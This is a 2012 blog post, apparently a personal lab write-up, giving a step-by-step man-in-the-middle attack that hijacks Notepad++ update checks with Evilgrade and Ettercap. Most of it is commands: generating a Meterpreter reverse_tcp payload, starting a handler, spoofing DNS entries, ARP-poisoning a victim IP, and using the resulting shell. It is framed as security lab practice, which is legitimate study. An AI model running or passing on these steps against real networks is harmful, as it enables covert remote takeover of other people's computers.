Sunday, September 2, 2012

Software Update MITM Exploit use Evilgrage and Ettercap

Many software check for updates, sometime updates are preformed over SSL. Commonly, updates are delivered over HTTP, which can be manipulated
Modular exploit tool to spoof Software Update Responses, to delivers executable of your choosing to the victim. In this lab, i used Evilgrade with Ettercap

Your victim machine use Notepad++ unstable:
1 - Unstable version
2 - Victim IP and DNS
Install Evilgrade on Backtrack system:
1 - # cd /root
2 - # apt-get install libdata-dump-perl
3 - # wget http://isr-evilgrade.googlecode.com/files/isr-evilgrade-2.0.0.tar.gz
4 - # tar xfz isr-evilgrade-2.0.0.tar.gz
5 - # cd isr-evilgrade
Prepare Metepreter executable to deliver to victim
1 - # ifconfig eth0
Get your Backtrack IP address
2 - # cd /root/isr-evilgrade/agent/
Go to evilgrade agent directory
3 - # /opt/metasploit/msf3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.174.132 LPORT=8080 X > agent.exe
Create metepreter executable
4 - # ls
Verify agent.exe

1 - # /opt/metasploit/msf3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=8080 LHOST=0.0.0.0 E
Start the Meterpreter handler to accept the reverse TCP connection
2 - Leave this command running while we continue the lab

1 - # echo "notepad-plus.sourceforge.net A 192.168.174.132" >> /usr/local/share/ettercap/etter.dns
Add entry to etter.dns to resolve notepad-plus.sourceforge.net
1 - # echo "download.tuxfamily.org A 192.168.174.132" >> /usr/local/share/ettercap/etter.dns
Add entry to etter.dns to resolve download.tuxfamily.org
3 - # gedit /usr/local/share/ettercap/etter.dns
Check your config

Launch Ettercap with ARP MITM attack
1 - # ettercap -Tqm arp:remote /192.168.174.150/ /8.8.8.8,4/
2 - Press "p" to chose plugin

3 - Invoke dns_spoof Ettercap plugin
4 - Test on victim systems

Invoke Evilgrade Notepad++ module
1 - #cd /root/isr-evilgrade
2 - ./evilgrade
3 - evilgrage> conf notepadplus
4 - evilgrage(notepadplush)>start

Note: If your Notepad++ version is higher than 5.8, you must edit Notepad++ module config file
1 - # gedit /root/isr-evilgrade/modules/notepadplus.pm
2 - Change 'vh' => 'notepad-plus.sourceforge.net' to 'vh' => 'download.tuxfamily.org'

On victim system
1 - Run Notepad++, click ? | Update Notepad++
2 - After downloading the update executable, Notepadd++ will prompt the user to install the update, Click "Yes"

Return Meterpreter on Backtrack System
From here you have control over the victim system, try enter Meterpreter command:
1 - sysinfo
2 - shell

------------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.

No comments:

Install Xposed Inspector and Frida on Genymotion

Today i had some work with android. So i need trace application. I found 2 nice tool can help me: Xposed Inspector and Frida. To setup ther...